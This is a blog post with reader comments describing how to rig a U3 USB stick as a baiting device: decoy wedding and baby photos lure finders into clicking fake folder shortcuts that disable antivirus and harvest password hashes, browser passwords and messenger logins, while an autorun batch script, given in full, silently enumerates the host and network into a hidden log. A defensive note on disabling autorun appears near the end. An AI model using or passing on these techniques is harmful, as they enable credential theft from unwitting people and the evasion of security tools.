Tuesday, February 24, 2009

Recently a mate at work commented that he got a bit stuck with the whole U3 Hacksaw / Switchblade kerfuffle. Well, I still had my original U3 setup from a couple of years ago, put together after watching the Hak.5 show (Series 2 if you're interested), but I thought it needed a bit of a refresh.

So what's the point of this, I hear you ask? Well, after using my Hacksaw here and there and seeing it detected by AV now and then, I figured that for it to be as stealthy as possible a few modifications were in order.

First I gave it a good overwrite with dd and started afresh with the builder tool. The tool I use is LPInstaller.exe. I can't remember where I got it from, but it wipes out all the pre-installed U3 goodness and leaves you with a U3 stick that you can mod to be the ultimate USB enumerator. (Note that dd only reaches the writable partition; the emulated CD partition is read-only and is what the installer replaces, which is why both steps are needed.)

With it looking like a brand new U3, this is where a little thought goes in. Now and then at work the receptionist sends an email to all users asking if anyone has lost a USB thumb drive. Well, I can take advantage of this good nature by placing a file with a throwaway email address in the root called "Contact Me if Found.txt".

Now when it's found or handed in to reception, some nice person might email me and let me know that they have it. But why would they do that? Because my next folder is titled "Wedding Pics - DO NOT DELETE" and it has a few wedding and baby pics in it (with the metadata stripped, remember).

So what cold-hearted person wouldn't want to return a USB device with baby and wedding pics on it, right? Oh, and the guy in the wedding photo... he's in a wheelchair (thanks Google Images), so it would have to be a cold-hearted individual who keeps that USB drive.

Next I have a couple more directories.

Well, they look like directories, but they are just shortcuts to my evil scripts that will help me on my dark crusade.

A closer look at the shortcut reveals it's actually a link to a batch file that will kill any running AV and launch programs to grab the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use passwords, don't we?

When someone clicks on one of these 'shortcuts', the running batch file drops behind any open windows and the only clue that anything is going on is a folder icon on the taskbar, which disappears after a few seconds.

And the batch file can do anything. Obviously I want to stop the AV first, and then, thanks to a few tools from NirSoft as well as a few others from the likes of foofus, I have loads of juicy details coming my way.

And what does this give me? Hashes, oh the lovely hashes.......

And of course we want the websites too.

And there's plenty more, but I'm sure you get the point.

But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it will (hopefully) use the autorun feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running a script kept in the hidden \WIP\CMD folder.

And the beauty of it all is that it's just using Microsoft's own built-in tools, which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any PC with a USB port on a network, you'll have more data than you can shake a big enumerating stick at. Wonderful!

All this useful data is output to a single log file in a deeply buried, obfuscated directory with a random number appended to the end, so it can be run time after time and is nicely tucked away.
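Here is what a script along those lines looks like. This is an added example written for this page, not the script from the author's \WIP\CMD folder. It assumes it is launched from the read-only CD partition of the U3 stick and that the writable partition is the one carrying the "Contact Me if Found.txt" decoy from earlier, which it uses to find somewhere it can write; the .sys\cache directory, the enum.cmd filename and the exact list of commands are my choices, not the author's.

```batch
@echo off
rem Added example for this page: host/network enumeration using only tools that
rem ship with Windows. Reconstruction, not the author's \WIP\CMD script.
rem Assumption: the "Contact Me if Found.txt" decoy sits in the root of the
rem writable partition, so whichever drive has it is where the log can go.
setlocal enableextensions

rem Find the writable partition. %~d0 would be the CD partition we run from,
rem which is read-only, so look for the decoy instead. Last match wins. C: is
rem skipped on purpose so a mistake never leaves the log on the host's own disk.
set "OUTDRIVE="
for %%D in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
  if exist "%%D:\Contact Me if Found.txt" set "OUTDRIVE=%%D:"
)
if not defined OUTDRIVE exit /b 1

rem Buried, hidden output directory. %RANDOM% goes on the end so repeated runs,
rem even on the same host, never overwrite an earlier log.
set "BASE=%OUTDRIVE%\.sys\cache"
set "OUTDIR=%BASE%\%COMPUTERNAME%-%RANDOM%"
mkdir "%OUTDIR%" 2>nul || (echo cannot create %OUTDIR% & exit /b 1)
attrib +h +s "%OUTDRIVE%\.sys" >nul 2>&1
set "LOG=%OUTDIR%\enum.log"

echo %DATE% %TIME% %COMPUTERNAME% %USERDOMAIN%\%USERNAME% >"%LOG%"

rem --- the box itself ---
call :run systeminfo
call :run net user
call :run net localgroup administrators
call :run net share
call :run net start
call :run tasklist

rem --- where it sits on the network ---
call :run ipconfig /all
call :run route print
call :run arp -a
call :run netstat -ano
call :run nbtstat -n
call :run netsh firewall show state

rem --- the domain and the neighbours (these just log an error on a workgroup box) ---
call :run net view
call :run net view /domain
call :run net group "Domain Admins" /domain
call :run net accounts /domain

endlocal
exit /b 0

rem Subroutine: write a header for the command, then append its stdout and
rem stderr to the single log file. %* is the whole command line passed to call.
:run
echo.>>"%LOG%"
echo ===== %* ===== >>"%LOG%"
%* >>"%LOG%" 2>&1
goto :eof
```

Point the autorun.inf on the CD partition at it with an open=WIP\CMD\enum.cmd line (relative paths in autorun.inf are resolved from the root of that drive), or front it with the folder-icon shortcut described above. Anything a given box doesn't have (systeminfo and tasklist are missing from XP Home, the /domain commands fail on a workgroup machine) just leaves an error line under its header rather than stopping the run. To try it on a lab machine without a stick, drop the decoy text file in the root of any drive other than C:.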

But what if autorun is disabled? Well, just like the script that kills the AV and grabs the passwords, this can be run manually by clicking the batch file, or by fronting it with a shortcut that has a folder icon and running that.
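A check that goes with that question, added here and not part of the original post: before relying on autorun, read the policy value Explorer actually consults. The batch below uses only reg.exe and find, and interprets the NoDriveTypeAutoRun bitmask for the two drive types a U3 stick presents to the host (a CD-ROM for the autorun partition, a removable drive for the writable one). The registry location and bit values are as Microsoft documents them; the wording of the messages is mine.

```batch
@echo off
rem Added example for this page, not from the original post: will this host
rem honour autorun on the drive types a U3 stick presents? Explorer reads the
rem NoDriveTypeAutoRun bitmask under Policies\Explorer; a set bit turns AutoRun
rem OFF for that drive type. HKLM takes precedence over HKCU.
rem   0x04  removable drives  (the writable part of the stick)
rem   0x20  CD-ROM drives     (the emulated CD partition carrying autorun.inf)
rem   0xFF  everything, which is what the "Turn off Autoplay" policy writes
setlocal enableextensions
set "KEY=Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
set "VAL="

rem HKCU first, then HKLM, so a machine-wide setting overrides the per-user one.
rem reg query prints "NoDriveTypeAutoRun  REG_DWORD  0x91"; token 3 is the value.
for %%H in (HKCU HKLM) do (
  for /f "tokens=3" %%V in ('reg query "%%H\%KEY%" /v NoDriveTypeAutoRun 2^>nul ^| find "NoDriveTypeAutoRun"') do set "VAL=%%V"
)

if not defined VAL (
  echo NoDriveTypeAutoRun is not set: the built-in default applies and CD-ROM autorun is on.
  exit /b 0
)

rem set /a understands the 0x prefix, so the mask can be tested bit by bit.
set /a "MASK=%VAL%"
set /a "CDROM=MASK & 0x20"
set /a "RMV=MASK & 0x04"

echo NoDriveTypeAutoRun = %VAL%
if %CDROM% neq 0 (echo CD-ROM autorun is OFF: the U3 CD partition will not launch anything, fall back to the shortcut.) else (echo CD-ROM autorun is ON.)
if %RMV% neq 0 (echo Removable-drive autorun is OFF.) else (echo Removable-drive autorun is ON.)
endlocal
```

Run it as whatever user you expect to be logged on, since the HKCU half is that user's own policy. The flip side for defenders is the same value: setting it to 0xFF in HKLM (or applying the "Turn off Autoplay" policy for all drives) is what stops the autorun half of this trick, though the folder-icon shortcut still works on anyone who double-clicks it.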

So how can this be useful in a pentest? It could be that during that pentest you have social-engineered your way onto a helpful person's PC, who is going to print something off for you or email an important document for you, and said files are on your USB device. Or you could hand a USB device to a receptionist and ask her to check whose it is. Or of course you could just be transferring those picture or music files to your friend's computer. So if you're reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you'd better think again!

So there you have it, my take on making my USB Hacksaw a little more interesting.

Thanks for leaving a comment. For the script that kills the AV I simply took a script from moonlit on the Hak5 forum. A bit of Google magic on moonlit and hak5 should turn it up. I didn't realise that Metasploit had that in, I'll have to take a look and compare.

That's a very good point and one of the reasons why I would either have a USB key for enumeration (which wouldn't be picked up by AV, and a restricted user can run the built-in tools (usually)) and then another USB key for the evil tools. Or another idea I'm playing with at the moment is having the evil tools in an encrypted TrueCrypt volume that doesn't get opened until the AV is off. I'll see where I get to with that but I'm sure it's do-able.

I'll post up my evil tools script either tonight or in the week as a comment on this post.

Hi, I don't understand, you have the payload installed in the writable partition? I thought that the science of using a U3 was being able to install the payload in the locked emulated CD drive so if the AV gets jumpy it won't be able to erase the files, and saving the log (logically) in the writable partition. Help if I'm wrong, please. Thanks for the info. It's still stealthy? The batch run by the autorun.inf doesn't get picked up? Cheers